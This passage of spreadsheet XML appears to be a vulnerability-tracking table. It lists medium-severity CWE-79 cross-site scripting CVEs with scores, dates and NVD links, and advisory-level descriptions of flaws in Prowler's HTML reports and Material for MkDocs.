          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1936" s="5" t="inlineStr"/>
      <c r="K1936" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1936" s="5" t="inlineStr">
        <is>
          <t>Prowler is a cloud security platform. Prior to 5.37.0, Prowler's HTML output formatter in prowler/lib/outputs/html/html.py inserted finding.resource_tags, assembled by unroll_dict and parse_html_string, into generated reports without HTML escaping, allowing a cloud principal who can modify a scanned resource tag to store HTML or JavaScript that executes when another user opens the report. This issue is fixed in version 5.37.0.</t>
        </is>
      </c>
      <c r="M1936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t>
        </is>
      </c>
    </row>
    <row r="1937">
      <c r="A1937" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73295</t>
        </is>
      </c>
      <c r="C1937" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1937" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1937" s="5" t="inlineStr"/>
      <c r="F1937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1937" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1937" s="5" t="inlineStr"/>
      <c r="I1937" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1937" s="5" t="inlineStr"/>
      <c r="K1937" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1937" s="5" t="inlineStr">
        <is>
          <t>Material for MkDocs is a powerful documentation framework built on top of MkDocs. From 7.2.0 until 9.7.7, the mountSearchSuggest function in src/templates/assets/javascripts/components/search/suggest/index.ts contains a DOM-based cross-site scripting vulnerability in the optional search.suggest feature that allows a crafted q URL parameter to execute JavaScript in a documentation site's origin after user interaction. This issue is fixed in version 9.7.7.</t>
        </is>
      </c>
      <c r="M1937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73295</t>
        </is>
      </c>
    </row>
    <row r="1938">
      <c r="A1938" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75629</t>
        </is>
      </c>
      <c r="C1938" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1938" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1938" s="5" t="inlineStr"/>
      <c r="F1938" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1938" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1938" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1938" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1938" s="5" t="inlineStr"/>
      <c r="K1938" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L193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38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75629</t>
        </is>
      </c>
    </row>
    <row r="1939">
      <c r="A1939" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75635</t>
        </is>
      </c>
      <c r="C1939" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1939" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1939" s="5" t="inlineStr"/>
      <c r="F1939" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1939" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1939" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1939" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1939" s="5" t="inlineStr"/>
      <c r="K1939" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L193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39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75635</t>
        </is>
      </c>
    </row>
    <row r="1940">
      <c r="A1940" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75636</t>
        </is>
      </c>
      <c r="C1940" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1940" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1940" s="5" t="inlineStr"/>
      <c r="F1940" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1940" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1940" s="5" t="inlineStr"/>
      <c r="I1940" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1940" s="5" t="inlineStr"/>
      <c r="K1940" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75636</t>
        </is>
      </c>
    </row>
    <row r="1941">
      <c r="A1941" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75637</t>
        </is>
      </c>
      <c r="C1941" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1941" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1941" s="5" t="inlineStr"/>
      <c r="F1941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1941" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1941" s="5" t="inlineStr"/>
      <c r="I1941" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1941" s="5" t="inlineStr"/>
      <c r="K1941" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75637</t>
        </is>
      </c>
    </row>
    <row r="1942">
      <c r="A1942" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75639</t>
        </is>
      </c>
      <c r="C1942" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1942" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1942" s="5" t="inlineStr"/>
      <c r="F1942" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1942" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1942" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1942" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1942" s="5" t="inlineStr"/>
      <c r="K1942" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75639</t>
        </is>
      </c>
    </row>
    <row r="1943">
      <c r="A1943" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75640</t>
        </is>
      </c>
      <c r="C1943" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1943" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1943" s="5" t="inlineStr"/>
      <c r="F1943" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1943" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1943" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1943" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1943" s="5" t="inlineStr"/>
      <c r="K1943" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75640</t>
        </is>
      </c>
    </row>
    <row r="1944">
      <c r="A1944" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75642</t>
        </is>
      </c>
      <c r="C1944" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1944" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1944" s="5" t="inlineStr"/>
      <c r="F1944" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1944" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1944" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1944" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1944" s="5" t="inlineStr"/>
      <c r="K1944" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75642</t>
        </is>
      </c>
    </row>
    <row r="1945">
      <c r="A1945" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75643</t>
        </is>
      </c>
      <c r="C1945" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1945" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1945" s="5" t="inlineStr"/>
      <c r="F1945" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1945" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1945" s="5" t="inlineStr"/>
      <c r="I1945" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1945" s="5" t="inlineStr"/>
      <c r="K1945" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75643</t>
        </is>
      </c>
    </row>
    <row r="1946">
      <c r="A1946" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75644</t>
        </is>
      </c>
      <c r="C1946" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1946" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1946" s="5" t="inlineStr"/>
      <c r="F1946" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1946" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1946" s="5" t="inlineStr"/>
      <c r="I1946" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1946" s="5" t="inlineStr"/>
      <c r="K1946" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75644</t>
        </is>
      </c>
    </row>
    <row r="1947">
      <c r="A1947" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75646</t>
        </is>
      </c>
      <c r="C1947" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1947" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1947" s="5" t="inlineStr"/>
      <c r="F1947" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1947" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1947" s="5" t="inlineStr"/>
      <c r="I1947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1947" s="5" t="inlineStr"/>
      <c r="K1947" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75646</t>
        </is>
      </c>
    </row>
    <row r="1948">
      <c r="A1948" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75647</t>
        </is>
      </c>
      <c r="C1948" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1948" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1948" s="5" t="inlineStr"/>
      <c r="F1948" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1948" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1948" s="5" t="inlineStr"/>
      <c r="I1948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1948" s="5" t="inlineStr"/>
      <c r="K1948" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75647</t>
        </is>
      </c>
    </row>
    <row r="1949">
      <c r="A1949" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75651</t>
        </is>
      </c>
      <c r="C1949" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1949" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1949" s="5" t="inlineStr"/>
      <c r="F1949" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1949" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1949" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1949" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1949" s="5" t="inlineStr"/>
      <c r="K1949" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L194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49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75651</t>
        </is>
      </c>
    </row>
    <row r="1950">
      <c r="A1950" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75652</t>
        </is>
      </c>
      <c r="C1950" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1950" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1950" s="5" t="inlineStr"/>
      <c r="F1950" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1950" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1950" s="5" t="inlineStr"/>
      <c r="I1950" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1950" s="5" t="inlineStr"/>
      <c r="K1950" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75652</t>
        </is>
      </c>
    </row>
    <row r="1951">
      <c r="A1951" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75657</t>
        </is>
      </c>
      <c r="C1951" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1951" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1951" s="5" t="inlineStr"/>
      <c r="F1951" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1951" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1951" s="5" t="inlineStr"/>
      <c r="I1951" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1951" s="5" t="inlineStr"/>
      <c r="K1951" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75657</t>
        </is>
      </c>
    </row>
    <row r="1952">
      <c r="A1952" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75659</t>
        </is>
      </c>
      <c r="C1952" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1952" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1952" s="5" t="inlineStr"/>
      <c r="F1952" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1952" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1952" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1952" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1952" s="5" t="inlineStr"/>
      <c r="K1952" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75659</t>
        </is>
      </c>
    </row>
    <row r="1953">
      <c r="A1953" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75660</t>
        </is>
      </c>
      <c r="C1953" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1953" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1953" s="5" t="inlineStr"/>
      <c r="F1953" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1953" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1953" s="5" t="inlineStr"/>
      <c r="I1953" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1953" s="5" t="inlineStr"/>
      <c r="K1953" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75660</t>
        </is>
      </c>
    </row>
    <row r="1954">
      <c r="A1954" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75661</t>
        </is>
      </c>
      <c r="C1954" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1954" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1954" s="5" t="inlineStr"/>
      <c r="F1954" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1954" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1954" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1954" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1954" s="5" t="inlineStr"/>
      <c r="K1954" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75661</t>
        </is>
      </c>
    </row>
    <row r="1955">
      <c r="A1955" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75666</t>
        </is>
      </c>
      <c r="C1955" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1955" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1955" s="5" t="inlineStr"/>
      <c r="F1955" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1955" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1955" s="5" t="inlineStr"/>
      <c r="I1955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1955" s="5" t="inlineStr"/>
      <c r="K1955" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75666</t>
        </is>
      </c>
    </row>
    <row r="1956">
      <c r="A1956" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75667</t>
        </is>
      </c>
      <c r="C1956" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1956" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1956" s="5" t="inlineStr"/>
      <c r="F1956" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1956" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1956" s="5" t="inlineStr"/>
      <c r="I1956" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1956" s="5" t="inlineStr"/>
      <c r="K1956" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75667</t>
        </is>
      </c>
    </row>
    <row r="1957">
      <c r="A1957" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75668</t>
        </is>
      </c>
      <c r="C1957" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1957" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1957" s="5" t="inlineStr"/>
      <c r="F1957" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1957" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1957" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1957" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1957" s="5" t="inlineStr"/>
      <c r="K1957" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75668</t>
        </is>
      </c>
    </row>
    <row r="1958">
      <c r="A1958" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75669</t>
        </is>
      </c>
      <c r="C1958" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1958" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1958" s="5" t="inlineStr"/>
      <c r="F1958" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1958" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1958" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1958" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1958" s="5" t="inlineStr"/>
      <c r="K1958" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75669</t>
        </is>
      </c>
    </row>
    <row r="1959">
      <c r="A1959" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75670</t>
        </is>
      </c>
      <c r="C1959" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1959" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1959" s="5" t="inlineStr"/>
      <c r="F1959" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1959" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1959" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1959" s="5" t="inlineStr"/>
      <c r="K1959" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L195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59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75670</t>
        </is>
      </c>
    </row>
    <row r="1960">
      <c r="A1960" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75671</t>
        </is>
      </c>
      <c r="C1960" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1960" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1960" s="5" t="inlineStr"/>
      <c r="F1960" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1960" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1960" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1960" s="5" t="inlineStr"/>
      <c r="K1960" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75671</t>
        </is>
      </c>
    </row>
    <row r="1961">
      <c r="A1961" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75672</t>
        </is>
      </c>
      <c r="C1961" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1961" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1961" s="5" t="inlineStr"/>
      <c r="F1961" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1961" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1961" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1961" s="5" t="inlineStr"/>
      <c r="K1961" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75672</t>
        </is>
      </c>
    </row>
    <row r="1962">
      <c r="A1962" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75674</t>
        </is>
      </c>
      <c r="C1962" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1962" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1962" s="5" t="inlineStr"/>
      <c r="F1962" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1962" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1962" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1962" s="5" t="inlineStr"/>
      <c r="K1962" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75674</t>
        </is>
      </c>
    </row>
    <row r="1963">
      <c r="A1963" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
